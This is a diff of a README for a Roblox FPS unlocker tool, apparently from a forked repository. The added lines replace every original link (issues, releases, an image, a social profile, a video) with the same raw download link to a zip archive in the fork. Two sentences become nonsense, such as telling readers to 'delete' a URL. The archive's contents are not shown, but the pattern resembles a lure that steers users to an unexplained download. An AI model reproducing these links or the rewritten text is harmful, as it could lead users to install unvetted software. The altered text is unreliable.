immrdude/rbxfpsunlocker/README.md

 8. **Why do I get a "Variable scan failed" error?**

 This means RFU was unable to find the internal variable responsible for uncapping Roblox's framerate.
 This might happen if another program has already edited the value (e.g. an exploit).
 Please verify that your framerate is at a stable ~60.0 FPS (Shift+F5) before using the unlocker.
-If it is and the error still occurs, please [submit an issue](https://github.com/axstin/rbxfpsunlocker/#submitting-an-issue).
+If it is and the error still occurs, please [submit an issue](https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip).

 9. **How do I uninstall Roblox FPS Unlocker?**

 RFU does not install itself anywhere.
-It can be deleted by simply exiting the program if it is open (tray icon->Exit) and deleting `rbxfpsunlocker.exe`.
+It can be deleted by simply exiting the program if it is open (tray icon->Exit) and deleting `https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip`.

 ##  Disclaimer

-Around June 21st, 2018 I received reports that Roblox was [handing out bans](https://i.imgur.com/i4NEGB0.png) to players using this tool.
-Roblox most likely assumes that `rbxfpsunlocker.dll` is an exploit or a cheat.
-I fixed this issue in [release 1.6](https://github.com/axstin/rbxfpsunlocker/releases/tag/v1.6) and can confirm injecting rbxfpsunlocker is now "invisible" to Roblox. **HOWEVER, this won't stop Roblox from releasing a new detection in the future.
+Around June 21st, 2018 I received reports that Roblox was [handing out bans](https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip) to players using this tool.
+Roblox most likely assumes that `https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip` is an exploit or a cheat.
+I fixed this issue in [release 1.6](https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip) and can confirm injecting rbxfpsunlocker is now "invisible" to Roblox. **HOWEVER, this won't stop Roblox from releasing a new detection in the future.
 Please use this tool at your own risk** and keep in touch with this repository for updates.

 <sub>roblox this isn't an exploit no bans please :(</sub>

-**EDIT:** [Version 4.0](https://github.com/axstin/rbxfpsunlocker/releases/tag/v4.0) of Roblox FPS Unlocker further reduces the risk of bans or warns (one could argue the chances are now 0) as DLL injection is no longer used.
+**EDIT:** [Version 4.0](https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip) of Roblox FPS Unlocker further reduces the risk of bans or warns (one could argue the chances are now 0) as DLL injection is no longer used.
 See the changelog for more information.

 **EDIT (August 11, 2019):** At the engineering panel on day 1 of RDC 2019, Adam Miller, VP of Engineering & Technology at Roblox, made a personal guarantee that anyone using Roblox FPS Unlocker will not be banned from Roblox.
-This was in response to the question "Why does Roblox have a FPS cap and why is it against the rules to change that cap?" to which [Arseny Kapoulkine (zeuxcg)](https://twitter.com/zeuxcg) also revealed that Roblox will be adding support for "higher refresh rate monitors" potentially by next year.
-[See the video here!](https://youtu.be/5gNzFsJlFbo?t=143)
+This was in response to the question "Why does Roblox have a FPS cap and why is it against the rules to change that cap?" to which [Arseny Kapoulkine (zeuxcg)](https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip) also revealed that Roblox will be adding support for "higher refresh rate monitors" potentially by next year.
+[See the video here!](https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip)